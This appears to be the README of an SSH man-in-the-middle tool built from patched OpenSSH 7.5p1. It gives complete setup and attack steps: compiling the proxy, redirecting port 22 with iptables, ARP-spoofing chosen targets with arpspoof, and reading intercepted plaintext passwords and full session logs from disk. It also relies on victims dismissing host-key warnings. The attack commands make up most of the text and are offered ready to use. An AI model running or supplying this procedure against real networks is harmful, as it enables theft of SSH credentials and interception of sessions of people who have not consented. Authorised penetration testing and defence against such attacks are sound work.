SSH MITM Tool
This penetration testing tool allows an auditor to intercept SSH connections. A patch applied to the OpenSSH v7.5p1 source code causes it to act as a proxy between the victim and their intended SSH server; all plaintext passwords and sessions are logged to disk.
Of course, the victim’s SSH client will complain that the server’s key has changed. But because 99.99999% of the time this is caused by a legitimate action (OS re-install, configuration change, etc), many/most users will disregard the warning and continue on.
Initial Setup
1.) Install zlib and openssl headers:
sudo apt install zlib1g-dev libssl-dev
2.) Download OpenSSH v7.5p1 and verify its signature:
wget https://ftp.openbsd.org/pub/OpenBSD/OpenSSH/RELEASE_KEY.asc
wget https://ftp.openbsd.org/pub/OpenBSD/OpenSSH/portable/openssh-7.5p1.tar.gz
wget https://ftp.openbsd.org/pub/OpenBSD/OpenSSH/portable/openssh-7.5p1.tar.gz.asc
gpg --import RELEASE_KEY.asc
gpg --verify openssh-7.5p1.tar.gz.asc openssh-7.5p1.tar.gz
3.) Unpack the tarball, patch the sources, and compile it:
tar xzf openssh-7.5p1.tar.gz
patch -p0 < openssh-7.5p1-mitm.patch
mv openssh-7.5p1 openssh-7.5p1-mitm; cd openssh-7.5p1-mitm; ./configure --with-sandbox=no && make -j 10
4.) Create keys and setup environment:
sudo ssh-keygen -t ed25519 -f /usr/local/etc/ssh_host_ed25519_key < /dev/null
sudo ssh-keygen -t rsa -b 4096 -f /usr/local/etc/ssh_host_rsa_key < /dev/null
sudo useradd -m sshd && sudo useradd -m bogus && sudo chmod 0700 ~sshd ~bogus
sudo mkdir /var/empty; sudo cp ssh ~bogus/
Running The Attack
1.) Run sshd:
cd /path/to/openssh-7.5p1-mitm
sudo $PWD/sshd -f $PWD/sshd_config
2.) Enable IP forwarding:
sudo bash -c "echo 1 > /proc/sys/net/ipv4/ip_forward"
sudo iptables -P FORWARD ACCEPT
3.) Allow connections to sshd and re-route forwarded SSH connections:
sudo iptables -A INPUT -p tcp --dport 22 -j ACCEPT
sudo iptables -t nat -A PREROUTING -p tcp --dport 22 -j REDIRECT --to-ports 22
4.) ARP spoof a target(s) (Protip: do NOT spoof all the things! Your puny network interface won’t likely be able to handle an entire network’s traffic all at once. Only spoof a couple IPs at a time):
arpspoof -r -t 192.168.x.1 192.168.x.5
5.) Monitor auth.log. Intercepted passwords will appear here:
sudo tail -f /var/log/auth.log
6.) Once a session is established, a full log of all input & output can be found in /home/bogus/session_*.txt.
Download